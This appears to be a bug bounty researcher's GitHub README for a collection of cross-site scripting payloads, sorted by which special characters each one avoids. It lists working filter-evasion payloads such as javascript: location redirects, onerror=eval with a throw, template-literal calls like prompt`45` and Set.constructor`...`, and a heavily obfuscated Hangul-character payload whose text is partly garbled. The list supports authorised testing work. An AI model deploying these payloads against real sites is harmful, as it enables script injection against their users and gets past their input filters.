XSS-Payload-without-Anything
XSS Payload without Anything.
What is XSS Payload without Anything
When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.
Let's collect a lot of thoughts and solve our problems.
Concept
It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.
format
without char: ()
,
'
XSS Payload
// usedchar:
// author:
// description:
without char (Frequently filtered characters)
I have selected special characters that are often blocked.
( )
{ }
,
"
'
`
[ ]
\
/
;
+
.
=
(template): ()
{}
,
"
'
backtick
[]
\
/
;
+
.
=
Usage
on Github.com
- Ctrl + F >
- find your problem char
- XSS
on hahwul.com comming soon
Awesome payload
coming soon
Archive
()
,
"
backtick
\
/
[]
{}
.
without char: location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
()
{}
,
"
backtick
[]
/
+
.
without char: onerror=eval;throw'alert\x2845\x29';
!backtick
without char: prompt`45`
()
{}
,
"
backtick``[]
/
;
+
.
without char: location='javaScriPt:alert\x2845\x29'
"
backtick
\
/
;
.
without char: ([,ν,,,,ν]=[]+{},[ν,κΈ,ν,μ΄,,λ‘,λ,γ
,,,γ
]=[!!ν]+!ν+ν.γ
)[ν+=ν+γ
+γ
+ν+κΈ+ν+ν+ν+ν+κΈ][ν](λ‘+λ+μ΄+κΈ+ν+'(45)')()
{}
,
"
'
backtick
\
/
;
+
=
without char: [45].some.alert()
()
{}
,
"
'
[]
\
/
;
+
=
without char: Set.constructor`alert\x2845\x29`
Submit XSS Payloads
Add issue form or pull Request
XSS Payload:
WithOut:
Description:
or ...
Tweet with me @hahwul